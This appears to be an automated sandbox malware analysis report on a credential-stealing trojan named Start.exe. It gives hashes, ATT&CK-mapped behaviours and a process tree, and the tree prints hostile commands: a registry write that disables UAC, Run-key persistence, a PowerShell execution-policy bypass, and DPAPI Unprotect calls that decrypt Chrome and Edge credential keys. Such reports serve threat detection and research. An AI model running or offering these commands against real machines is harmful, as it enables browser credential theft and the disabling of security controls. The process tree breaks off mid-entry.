4ceac8889d18635deb9bd445cc15411af192f959186242e6d3e82c5326ae53fc

Analysis

max time kernel
29s
max time network
18s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2024, 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Start.exe
Size

37.7MB
MD5

a226c4a3b3f80861f9f91990ba69e6c5
SHA1

7d611dbf0e4305506e4fbebd50f585b41f26227b
SHA256

4ceac8889d18635deb9bd445cc15411af192f959186242e6d3e82c5326ae53fc
SHA512

c24621327aa8c9fc57ff7d8a58471585ee01efbacf9c3291f81dbc05881f84d21dddd3c714b9f87eb74dfd08bd95283157c3120efd5feb926041e4c6e9268054
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgi96l+ZArYsFRlF5L:R3on1HvSzxAMNiFZArYs3Pvas7OZoT

Score

10^/10

credential_access discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3472	powershell.exe
1756	powershell.exe
3644	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Start.exe

Executes dropped EXE 2 IoCs

pid	Process
540	python-installer.exe
1376	python-installer.exe

Loads dropped DLL 2 IoCs

pid	Process
896	Start.exe
1376	python-installer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start = "C:\\ProgramData\\Update.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4496	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
4808	cmd.exe
1560	cmd.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\6ByHHQonv4.txt	Start.exe
File opened for modification	C:\Windows\System32\6ByHHQonv4.txt	Start.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3336	tasklist.exe
2860	tasklist.exe

Drops file in Windows directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\e57e803.msi	msiexec.exe
File created	C:\Windows\Installer\e57e7fe.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEBA8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF34B.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e57e80d.msi	msiexec.exe
File created	C:\Windows\Installer\e57e811.msi	msiexec.exe
File created	C:\Windows\Installer\e57e812.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEF91.tmp	msiexec.exe
File created	C:\Windows\Installer\e57e808.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e808.msi	msiexec.exe
File created	C:\Windows\Installer\e57e80c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e7fe.msi	msiexec.exe
File created	C:\Windows\Installer\e57e802.msi	msiexec.exe
File created	C:\Windows\Installer\e57e807.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e80d.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI13E5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e812.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{08A1963D-07D1-4620-929C-385F6A307772}	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e803.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{1DAEF824-881A-49C6-B91E-1D28877FF18D}	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe

Modifies registry class 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\DisplayName = "Python 3.12.6 Standard Library (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\ = "{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}\DisplayName = "Python 3.12.6 Tcl/Tk Support (64-bit)"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}\ = "{08A1963D-07D1-4620-929C-385F6A307772}"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\DisplayName = "Python 3.12.6 Development Libraries (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\ = "{1DAEF824-881A-49C6-B91E-1D28877FF18D}"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{1DAEF824-881A-49C6-B91E-1D28877FF18D}\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Installer\Dependencies\{08A1963D-07D1-4620-929C-385F6A307772}	python-installer.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3644	powershell.exe
3644	powershell.exe
1796	powershell.exe
1796	powershell.exe
1700	powershell.exe
1700	powershell.exe
3472	powershell.exe
3472	powershell.exe
1756	powershell.exe
1756	powershell.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe
4496	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	4156	WMIC.exe
Token: SeSecurityPrivilege	4156	WMIC.exe
Token: SeTakeOwnershipPrivilege	4156	WMIC.exe
Token: SeLoadDriverPrivilege	4156	WMIC.exe
Token: SeSystemProfilePrivilege	4156	WMIC.exe
Token: SeSystemtimePrivilege	4156	WMIC.exe
Token: SeProfSingleProcessPrivilege	4156	WMIC.exe
Token: SeIncBasePriorityPrivilege	4156	WMIC.exe
Token: SeCreatePagefilePrivilege	4156	WMIC.exe
Token: SeBackupPrivilege	4156	WMIC.exe
Token: SeRestorePrivilege	4156	WMIC.exe
Token: SeShutdownPrivilege	4156	WMIC.exe
Token: SeDebugPrivilege	4156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4156	WMIC.exe
Token: SeRemoteShutdownPrivilege	4156	WMIC.exe
Token: SeUndockPrivilege	4156	WMIC.exe
Token: SeManageVolumePrivilege	4156	WMIC.exe
Token: 33	4156	WMIC.exe
Token: 34	4156	WMIC.exe
Token: 35	4156	WMIC.exe
Token: 36	4156	WMIC.exe
Token: SeDebugPrivilege	3336	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4156	WMIC.exe
Token: SeSecurityPrivilege	4156	WMIC.exe
Token: SeTakeOwnershipPrivilege	4156	WMIC.exe
Token: SeLoadDriverPrivilege	4156	WMIC.exe
Token: SeSystemProfilePrivilege	4156	WMIC.exe
Token: SeSystemtimePrivilege	4156	WMIC.exe
Token: SeProfSingleProcessPrivilege	4156	WMIC.exe
Token: SeIncBasePriorityPrivilege	4156	WMIC.exe
Token: SeCreatePagefilePrivilege	4156	WMIC.exe
Token: SeBackupPrivilege	4156	WMIC.exe
Token: SeRestorePrivilege	4156	WMIC.exe
Token: SeShutdownPrivilege	4156	WMIC.exe
Token: SeDebugPrivilege	4156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4156	WMIC.exe
Token: SeRemoteShutdownPrivilege	4156	WMIC.exe
Token: SeUndockPrivilege	4156	WMIC.exe
Token: SeManageVolumePrivilege	4156	WMIC.exe
Token: 33	4156	WMIC.exe
Token: 34	4156	WMIC.exe
Token: 35	4156	WMIC.exe
Token: 36	4156	WMIC.exe
Token: SeDebugPrivilege	2860	tasklist.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeIncreaseQuotaPrivilege	1696	WMIC.exe
Token: SeSecurityPrivilege	1696	WMIC.exe
Token: SeTakeOwnershipPrivilege	1696	WMIC.exe
Token: SeLoadDriverPrivilege	1696	WMIC.exe
Token: SeSystemProfilePrivilege	1696	WMIC.exe
Token: SeSystemtimePrivilege	1696	WMIC.exe
Token: SeProfSingleProcessPrivilege	1696	WMIC.exe
Token: SeIncBasePriorityPrivilege	1696	WMIC.exe
Token: SeCreatePagefilePrivilege	1696	WMIC.exe
Token: SeBackupPrivilege	1696	WMIC.exe
Token: SeRestorePrivilege	1696	WMIC.exe
Token: SeShutdownPrivilege	1696	WMIC.exe
Token: SeDebugPrivilege	1696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1696	WMIC.exe
Token: SeRemoteShutdownPrivilege	1696	WMIC.exe
Token: SeUndockPrivilege	1696	WMIC.exe
Token: SeManageVolumePrivilege	1696	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 1228	896	Start.exe	83
PID 896 wrote to memory of 1228	896	Start.exe	83
PID 1228 wrote to memory of 3644	1228	cmd.exe	84
PID 1228 wrote to memory of 3644	1228	cmd.exe	84
PID 3644 wrote to memory of 2012	3644	powershell.exe	85
PID 3644 wrote to memory of 2012	3644	powershell.exe	85
PID 2012 wrote to memory of 3896	2012	csc.exe	86
PID 2012 wrote to memory of 3896	2012	csc.exe	86
PID 896 wrote to memory of 4888	896	Start.exe	87
PID 896 wrote to memory of 4888	896	Start.exe	87
PID 896 wrote to memory of 3064	896	Start.exe	88
PID 896 wrote to memory of 3064	896	Start.exe	88
PID 3064 wrote to memory of 3336	3064	cmd.exe	89
PID 3064 wrote to memory of 3336	3064	cmd.exe	89
PID 4888 wrote to memory of 4156	4888	cmd.exe	90
PID 4888 wrote to memory of 4156	4888	cmd.exe	90
PID 896 wrote to memory of 1908	896	Start.exe	92
PID 896 wrote to memory of 1908	896	Start.exe	92
PID 896 wrote to memory of 4808	896	Start.exe	93
PID 896 wrote to memory of 4808	896	Start.exe	93
PID 1908 wrote to memory of 2860	1908	cmd.exe	94
PID 1908 wrote to memory of 2860	1908	cmd.exe	94
PID 4808 wrote to memory of 1796	4808	cmd.exe	95
PID 4808 wrote to memory of 1796	4808	cmd.exe	95
PID 896 wrote to memory of 1560	896	Start.exe	96
PID 896 wrote to memory of 1560	896	Start.exe	96
PID 1560 wrote to memory of 1700	1560	cmd.exe	97
PID 1560 wrote to memory of 1700	1560	cmd.exe	97
PID 896 wrote to memory of 872	896	Start.exe	98
PID 896 wrote to memory of 872	896	Start.exe	98
PID 872 wrote to memory of 2456	872	cmd.exe	99
PID 872 wrote to memory of 2456	872	cmd.exe	99
PID 896 wrote to memory of 1468	896	Start.exe	100
PID 896 wrote to memory of 1468	896	Start.exe	100
PID 896 wrote to memory of 3700	896	Start.exe	101
PID 896 wrote to memory of 3700	896	Start.exe	101
PID 896 wrote to memory of 3932	896	Start.exe	102
PID 896 wrote to memory of 3932	896	Start.exe	102
PID 1468 wrote to memory of 1696	1468	cmd.exe	103
PID 1468 wrote to memory of 1696	1468	cmd.exe	103
PID 3700 wrote to memory of 1572	3700	cmd.exe	104
PID 3700 wrote to memory of 1572	3700	cmd.exe	104
PID 3932 wrote to memory of 3472	3932	cmd.exe	105
PID 3932 wrote to memory of 3472	3932	cmd.exe	105
PID 896 wrote to memory of 3940	896	Start.exe	106
PID 896 wrote to memory of 3940	896	Start.exe	106
PID 3940 wrote to memory of 1756	3940	cmd.exe	107
PID 3940 wrote to memory of 1756	3940	cmd.exe	107
PID 896 wrote to memory of 4984	896	Start.exe	110
PID 896 wrote to memory of 4984	896	Start.exe	110
PID 896 wrote to memory of 4364	896	Start.exe	111
PID 896 wrote to memory of 4364	896	Start.exe	111
PID 896 wrote to memory of 3100	896	Start.exe	112
PID 896 wrote to memory of 3100	896	Start.exe	112
PID 4984 wrote to memory of 1556	4984	cmd.exe	113
PID 4984 wrote to memory of 1556	4984	cmd.exe	113
PID 4364 wrote to memory of 656	4364	cmd.exe	114
PID 4364 wrote to memory of 656	4364	cmd.exe	114
PID 896 wrote to memory of 1404	896	Start.exe	115
PID 896 wrote to memory of 1404	896	Start.exe	115
PID 1404 wrote to memory of 2552	1404	cmd.exe	116
PID 1404 wrote to memory of 2552	1404	cmd.exe	116
PID 896 wrote to memory of 3420	896	Start.exe	117
PID 896 wrote to memory of 3420	896	Start.exe	117

C:\Users\Admin\AppData\Local\Temp\Start.exe
"C:\Users\Admin\AppData\Local\Temp\Start.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\qjsKwyvhaq.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\qjsKwyvhaq.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yvboogpr\yvboogpr.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2012
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC515.tmp" "c:\Users\Admin\AppData\Local\Temp\yvboogpr\CSCC70D5267D0774097897B43EE579EFCE.TMP"
        5⤵
        
        PID:3896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,116,71,43,235,231,175,58,70,148,36,38,225,226,119,180,42,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,175,102,183,76,85,140,5,116,220,229,222,217,248,9,190,74,214,216,144,208,16,126,192,58,56,102,164,106,194,80,251,31,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,110,80,33,142,146,193,133,38,91,227,73,89,67,25,234,100,174,184,123,30,46,14,166,233,24,120,88,136,207,220,183,158,48,0,0,0,155,48,12,214,112,213,46,142,17,19,47,167,72,84,59,186,45,116,222,156,11,49,38,233,11,89,92,71,38,121,32,221,48,228,239,112,154,16,73,3,234,113,76,81,201,185,105,116,64,0,0,0,106,186,117,210,251,192,68,153,101,94,86,36,20,143,168,1,33,32,178,13,223,62,8,122,20,253,119,78,219,43,144,69,136,223,249,6,136,81,87,96,145,123,78,63,53,250,71,186,161,72,27,44,150,62,214,6,73,45,157,133,11,179,36,157), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,116,71,43,235,231,175,58,70,148,36,38,225,226,119,180,42,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,175,102,183,76,85,140,5,116,220,229,222,217,248,9,190,74,214,216,144,208,16,126,192,58,56,102,164,106,194,80,251,31,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,110,80,33,142,146,193,133,38,91,227,73,89,67,25,234,100,174,184,123,30,46,14,166,233,24,120,88,136,207,220,183,158,48,0,0,0,155,48,12,214,112,213,46,142,17,19,47,167,72,84,59,186,45,116,222,156,11,49,38,233,11,89,92,71,38,121,32,221,48,228,239,112,154,16,73,3,234,113,76,81,201,185,105,116,64,0,0,0,106,186,117,210,251,192,68,153,101,94,86,36,20,143,168,1,33,32,178,13,223,62,8,122,20,253,119,78,219,43,144,69,136,223,249,6,136,81,87,96,145,123,78,63,53,250,71,186,161,72,27,44,150,62,214,6,73,45,157,133,11,179,36,157), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,116,71,43,235,231,175,58,70,148,36,38,225,226,119,180,42,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,185,82,241,64,35,177,4,127,193,229,68,37,247,46,96,144,30,239,64,6,133,165,15,215,110,254,43,248,105,138,255,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,245,85,150,239,22,155,41,192,40,253,154,178,209,187,164,77,42,25,153,38,155,82,91,24,11,119,39,87,116,54,10,15,48,0,0,0,252,7,4,170,15,69,230,247,199,10,198,89,242,170,184,105,230,84,232,166,66,104,216,221,123,25,72,147,229,38,192,210,67,210,176,228,145,109,100,153,0,73,198,33,198,225,7,201,64,0,0,0,14,247,138,184,59,107,168,37,165,80,13,26,147,70,12,226,84,120,251,246,7,165,136,226,94,24,55,239,174,14,49,249,19,13,163,63,196,149,112,1,5,80,206,30,125,50,157,33,55,85,244,67,148,221,214,110,110,58,251,151,167,176,238,226), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
